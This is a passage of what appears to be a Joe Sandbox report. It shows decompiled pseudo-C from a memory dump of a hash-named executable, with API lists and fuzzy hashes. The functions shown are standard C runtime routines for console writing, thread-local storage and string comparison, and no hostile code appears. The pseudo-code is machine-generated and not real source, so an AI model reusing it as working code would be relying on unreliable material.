				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0x13ca014; // 0xfcb69da6
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x13d9960 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E013B3CB8( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x13d9960 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0x13ca788; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x13d9960 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E013BC4A1( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x13ca788)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0x13d9960 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E013B32F0( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0x13d9960 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E013BC4A1( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E013B9D52(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E013BA825(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t100 =  &(_t269[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0x13d9960 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0x13d9960 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x13d9960 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E013B73E5( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E013B73E5();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E013B1EDB(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x013bb9bf
0x013bb9c6
0x013bb9c9
0x013bb9d1
0x013bb9d4
0x013bb9e1
0x013bb9e4
0x013bb9e7
0x013bb9ee
0x013bb9f6
0x013bb9f9
0x013bb9fc
0x013bba02
0x013bba04
0x013bba0b
0x013bba15
0x013bba17
0x013bba1a
0x013bba1d
0x013bba20
0x013bba23
0x013bba26
0x013bba2c
0x013bbd37
0x013bbd37
0x00000000
0x013bba32
0x013bba3a
0x013bba3d
0x013bba43
0x013bba46
0x013bba4d
0x013bba54
0x013bba57
0x00000000
0x00000000
0x013bba60
0x013bba65
0x013bba67
0x013bba6a
0x013bba6f
0x013bba73
0x00000000
0x00000000
0x00000000
0x013bba73
0x013bba78
0x013bba7a
0x013bba7f
0x013bbb39
0x013bbb40
0x013bbb41
0x013bbb44
0x013bbb46
0x013bbcea
0x013bbcec
0x00000000
0x013bbcee
0x013bbcee
0x013bbcf1
0x013bbd00
0x013bbd04
0x013bbd05
0x013bbd05
0x00000000
0x013bbd09
0x013bbb4c
0x013bbb4e
0x013bbb54
0x013bbb57
0x013bbb63
0x013bbb6c
0x013bbb77
0x013bbb7c
0x013bbb7f
0x013bbb82
0x00000000
0x013bbb88
0x013bbb88
0x00000000
0x013bbb88
0x013bbb82
0x013bba85
0x013bba94
0x013bba95
0x013bba98
0x013bba9b
0x013bbaa0
0x013bbcb6
0x013bbcb8
0x013bbcba
0x013bbcbc
0x013bbcc6
0x013bbcce
0x013bbcd0
0x013bbcd1
0x013bbcd5
0x013bbcd8
0x013bbcd8
0x013bbcdc
0x013bbcdc
0x013bbcdc
0x013bbcdf
0x013bbcdf
0x013bbcdf
0x013bbce1
0x013bbce1
0x013bbce5
0x013bbaa6
0x013bbaa6
0x013bbaa9
0x013bbaab
0x013bbaae
0x013bbab1
0x013bbab5
0x013bbab6
0x013bbaba
0x013bbabd
0x013bbac2
0x013bbacc
0x013bbad1
0x013bbad4
0x013bbad7
0x013bbad7
0x013bbada
0x013bbadd
0x013bbadf
0x013bbae8
0x013bbaec
0x013bbaed
0x013bbaf1
0x013bbaf7
0x013bbb00
0x013bbb0d
0x013bbb14
0x013bbb18
0x013bbb23
0x013bbb28
0x013bbb2e
0x00000000
0x013bbb34
0x013bbb8b
0x013bbb8c
0x013bbc0f
0x013bbc16
0x013bbc1e
0x013bbc26
0x013bbc2b
0x013bbc2e
0x013bbc33
0x00000000
0x013bbc39
0x013bbc4e
0x013bbd2e
0x013bbd34
0x00000000
0x013bbc54
0x013bbc5d
0x013bbc5f
0x013bbc65
0x00000000
0x013bbc6b
0x013bbc6f
0x013bbca5
0x013bbca8
0x00000000
0x013bbcae
0x013bbcae
0x00000000
0x013bbcae
0x013bbc71
0x013bbc73
0x013bbc75
0x013bbc8e
0x00000000
0x013bbc94
0x013bbc98
0x00000000
0x013bbc9e
0x013bbc9e
0x013bbca1
0x013bbca2
0x00000000
0x013bbca2
0x013bbc98
0x013bbc8e
0x013bbc6f
0x013bbc65
0x013bbc4e
0x013bbc33
0x013bbb2e
0x013bbaa0
0x00000000
0x013bbb90
0x013bbb90
0x013bbb94
0x013bbb97
0x013bbbb9
0x013bbbbc
0x013bbbc1
0x013bbbc5
0x013bbbc9
0x013bbbf7
0x013bbbf9
0x00000000
0x013bbbcb
0x013bbbcb
0x013bbbcb
0x013bbbce
0x013bbbd1
0x013bbbd4
0x013bbd0b
0x013bbd0e
0x013bbd11
0x013bbd1b
0x013bbd26
0x013bbd2b
0x00000000
0x013bbbda
0x013bbbe1
0x013bbbe6
0x013bbbe9
0x013bbbec
0x00000000
0x013bbbf2
0x013bbbf2
0x00000000
0x013bbbf2
0x013bbbec
0x013bbbd4
0x013bbb99
0x013bbb9d
0x013bbba0
0x013bbba5
0x013bbbab
0x013bbbad
0x013bbbb4
0x013bbbfa
0x013bbbfd
0x013bbbfe
0x013bbc03
0x013bbc06
0x013bbc09
0x00000000
0x00000000
0x00000000
0x00000000
0x013bbc09
0x00000000
0x013bbb97
0x013bba32
0x013bbd3a
0x013bbd3a
0x013bbd3c
0x013bbd3f
0x013bbd3f
0x013bbd3f
0x013bbd3f
0x013bbd51
0x013bbd53
0x013bbd54
0x013bbd55
0x013bbd5f

APIs

GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 013BB9FC
__fassign.LIBCMT ref: 013BBBE1
__fassign.LIBCMT ref: 013BBBFE
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013BBC46
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 013BBC86
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 013BBD2E

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: a10c51fc86708bdf552b942c2c3f2373883320fca18c076abafbe3c1807ed3b9
Instruction ID: 9e8904efafbfce0c78fe1c115e7e07de0b19e8f108c4fb8f0e8a3ad6db40b642
Opcode Fuzzy Hash: a10c51fc86708bdf552b942c2c3f2373883320fca18c076abafbe3c1807ed3b9
Instruction Fuzzy Hash: 57C1AF71D0025D9FDF11CFA8C8C09EDFBB9BF08318F18416AEA55B7645EA319A02CB60

Uniqueness

Uniqueness Score: -1.00%

Function 013B2F51 Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E013B2F51(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x13ca020 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E013B3224(_t13,  *0x13ca020);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E013B325F(_t14,  *0x13ca020, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E013B631D();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E013B325F(_t18,  *0x13ca020, 0);
								} else {
									_t8 = E013B325F(_t18,  *0x13ca020, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E013B6264(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x013b2f51
0x013b2f58
0x013b2f6b
0x013b2f72
0x013b2f74
0x013b2f78
0x013b2f91
0x013b2f91
0x013b2f7a
0x013b2f7c
0x013b2f8f
0x013b2f96
0x013b2f9f
0x013b2fa2
0x013b2fa5
0x013b2fb9
0x013b2fb9
0x013b2fc2
0x013b2fa7
0x013b2fae
0x013b2fb4
0x013b2fb7
0x013b2fcb
0x013b2fcd
0x00000000
0x00000000
0x00000000
0x013b2fb7
0x013b2fd0
0x00000000
0x00000000
0x00000000
0x013b2f8f
0x013b2f7c
0x013b2fd8
0x013b2fe2
0x013b2f5a
0x013b2f5c
0x013b2f5c

APIs

GetLastError.KERNEL32(?,?,013B2F48,013B2C1F,013B2462), ref: 013B2F5F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 013B2F6D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 013B2F86
SetLastError.KERNEL32(00000000,013B2F48,013B2C1F,013B2462), ref: 013B2FD8

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: aadba57ec8180b4ff05e07e3c3c4b7da78b74ac8a516428841cb88aeab236e46
Instruction ID: 7b7070bb589e8c769d975925ab002a144cf228fb07b7b9d3f32d22d6f2a4058d
Opcode Fuzzy Hash: aadba57ec8180b4ff05e07e3c3c4b7da78b74ac8a516428841cb88aeab236e46
Instruction Fuzzy Hash: 3B01B5335093266DEA252A7CBCC45EB2658EB156BCB200329E714498E5FB5178048750

Uniqueness

Uniqueness Score: -1.00%

Function 013B92DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E013B92DD(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E013B9D52(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E013B9D52(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E013B6715(GetLastError());
									_t17 =  *((intOrPtr*)(E013B674B(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E013B93A4(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E013B6715(GetLastError());
						_t17 =  *((intOrPtr*)(E013B674B(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E013B93A4(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E013B93CB(_a8);
				return 0;
			}

0x013b92e3
0x013b92e8
0x013b92fc
0x013b92ff
0x013b9331
0x013b9339
0x013b933b
0x013b9354
0x013b9357
0x013b935a
0x013b9368
0x013b9377
0x013b937f
0x013b9381
0x013b939a
0x013b939d
0x013b939d
0x013b9383
0x013b938a
0x013b9395
0x013b9395
0x013b939f
0x013b93a0
0x00000000
0x013b93a0
0x013b935f
0x013b9364
0x013b9366
0x00000000
0x00000000
0x00000000
0x013b9366
0x013b9344
0x013b934f
0x00000000
0x013b934f
0x013b9301
0x013b9304
0x013b9307
0x013b931a
0x013b931d
0x013b931f
0x013b9321
0x00000000
0x013b9321
0x013b930d
0x013b9312
0x013b9314
0x00000000
0x00000000
0x00000000
0x013b9314
0x013b92ed
0x00000000

Strings

C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe, xrefs: 013B92E2

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe
API String ID: 0-1325067775
Opcode ID: 235042d4014a3be1274a3101f1a0d8521fa2be062981a48e5f62aa802d9e07f3
Instruction ID: c9b93ddc82c8c05a0efb34330665c35a34b7ef19cc25b722ea66e81c7ca858bf
Opcode Fuzzy Hash: 235042d4014a3be1274a3101f1a0d8521fa2be062981a48e5f62aa802d9e07f3
Instruction Fuzzy Hash: 91219FF160120AAFDB21AF698CC0BEA77ACEF5126C7105615E719D7991F731EC408760

Uniqueness

Uniqueness Score: -1.00%

Function 013B5A1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E013B5A1F(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x13c310c(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x013b5a25
0x013b5a29
0x013b5a34
0x013b5a3c
0x013b5a47
0x013b5a4d
0x013b5a51
0x013b5a58
0x013b5a5e
0x013b5a5e
0x013b5a60
0x013b5a65
0x00000000
0x013b5a6a
0x013b5a71

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,013B59D1,?,?,013B5999,?,?,?), ref: 013B5A34
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 013B5A47
FreeLibrary.KERNEL32(00000000,?,?,013B59D1,?,?,013B5999,?,?,?), ref: 013B5A6A

Strings

mscoree.dll, xrefs: 013B5A2D
CorExitProcess, xrefs: 013B5A3F

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 3baad51c03179848fa608b94998407493d3ddbb69fc27b54678118b50c901634
Instruction ID: 557c1c378fa70399bae9afb2ba360da84bea21177330a2e4fa94722017da331e
Opcode Fuzzy Hash: 3baad51c03179848fa608b94998407493d3ddbb69fc27b54678118b50c901634
Instruction Fuzzy Hash: 28F01231641218FFEB22AB55D949BDDBF78FB40759F144054EA06B1154DB709E40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 013C0071 Relevance: 7.7, APIs: 5, Instructions: 244
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E013C0071(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				intOrPtr* _t60;
				int _t62;
				signed int _t65;
				signed int _t66;
				intOrPtr* _t67;
				void* _t69;
				signed int _t70;
				signed int _t71;
				intOrPtr* _t77;
				char* _t79;
				char* _t80;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr* _t102;
				signed int _t104;
				void* _t105;
				intOrPtr* _t107;
				void* _t108;
				intOrPtr* _t109;

				_t55 =  *0x13ca014; // 0xfcb69da6
				_v8 = _t55 ^ _t104;
				_t103 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t59 = _a24;
				_v40 = _a24;
				_t102 = _a16;
				_v36 = _t102;
				if(_t103 <= 0) {
					if(_t103 < 0xffffffff) {
						goto L60;
					} else {
						goto L3;
					}
				} else {
					_t103 = E013BFF1F(_t102, _t103);
					_t59 = _v40;
					L3:
					_t85 = _a28;
					if(_t85 <= 0) {
						if(_t85 < 0xffffffff) {
							goto L60;
						} else {
							goto L6;
						}
					} else {
						_t85 = E013BFF1F(_t59, _t85);
						L6:
						_t62 = _a32;
						if(_t62 == 0) {
							_t62 =  *( *_v44 + 8);
							_a32 = _t62;
						}
						if(_t103 == 0 || _t85 == 0) {
							if(_t103 == _t85) {
								L59:
								_push(2);
								goto L22;
							} else {
								if(_t85 > 1) {
									L31:
									_t60 = 1;
								} else {
									if(_t103 > 1) {
										L21:
										_push(3);
										goto L22;
									} else {
										if(GetCPInfo(_t62,  &_v28) == 0) {
											goto L60;
										} else {
											if(_t103 <= 0) {
												if(_t85 <= 0) {
													goto L32;
												} else {
													if(_v28 >= 2) {
														_t79 =  &_v22;
														if(_v22 != 0) {
															_t103 = _v40;
															while(1) {
																_t95 =  *((intOrPtr*)(_t79 + 1));
																if(_t95 == 0) {
																	goto L31;
																}
																_t101 =  *_t103;
																if(_t101 <  *_t79 || _t101 > _t95) {
																	_t79 = _t79 + 2;
																	if( *_t79 != 0) {
																		continue;
																	} else {
																		goto L31;
																	}
																} else {
																	goto L59;
																}
																goto L61;
															}
														}
													}
													goto L31;
												}
											} else {
												if(_v28 >= 2) {
													_t80 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t96 =  *((intOrPtr*)(_t80 + 1));
															if(_t96 == 0) {
																goto L21;
															}
															_t101 =  *_t102;
															if(_t101 <  *_t80 || _t101 > _t96) {
																_t80 = _t80 + 2;
																if( *_t80 != 0) {
																	continue;
																} else {
																	goto L21;
																}
															} else {
																goto L59;
															}
															goto L22;
														}
													}
												}
												goto L21;
												L22:
												_pop(_t60);
											}
										}
									}
								}
							}
						} else {
							L32:
							_t102 = 0;
							_t65 = E013B9CD6(_a32, 9, _v36, _t103, 0, 0);
							_t107 = _t105 + 0x18;
							_v44 = _t65;
							if(_t65 == 0) {
								L60:
								_t60 = 0;
							} else {
								_t101 = _t65 + _t65 + 8;
								asm("sbb eax, eax");
								_t66 = _t65 & _t65 + _t65 + 0x00000008;
								if(_t66 == 0) {
									_t67 = 0;
									_v32 = 0;
									goto L41;
								} else {
									if(_t66 > 0x400) {
										_t77 = E013B7210(_t66);
										_v32 = _t77;
										if(_t77 == 0) {
											goto L57;
										} else {
											 *_t77 = 0xdddd;
											goto L39;
										}
									} else {
										E013C1ED0(_t66);
										_t77 = _t107;
										_v32 = _t77;
										if(_t77 == 0) {
											L57:
											_t85 = _v32;
										} else {
											 *_t77 = 0xcccc;
											L39:
											_t67 = _t77 + 8;
											_v32 = _t67;
											L41:
											if(_t67 == 0) {
												goto L57;
											} else {
												_t103 = _a32;
												_t69 = E013B9CD6(_a32, 1, _v36, _a32, _t67, _v44);
												_t108 = _t107 + 0x18;
												if(_t69 == 0) {
													goto L57;
												} else {
													_t70 = E013B9CD6(_t103, 9, _v40, _t85, _t102, _t102);
													_t109 = _t108 + 0x18;
													_v36 = _t70;
													if(_t70 == 0) {
														goto L57;
													} else {
														_t101 = _t70 + _t70 + 8;
														asm("sbb eax, eax");
														_t71 = _t70 & _t70 + _t70 + 0x00000008;
														if(_t71 == 0) {
															_t103 = _t102;
															goto L52;
														} else {
															if(_t71 > 0x400) {
																_t103 = E013B7210(_t71);
																if(_t103 == 0) {
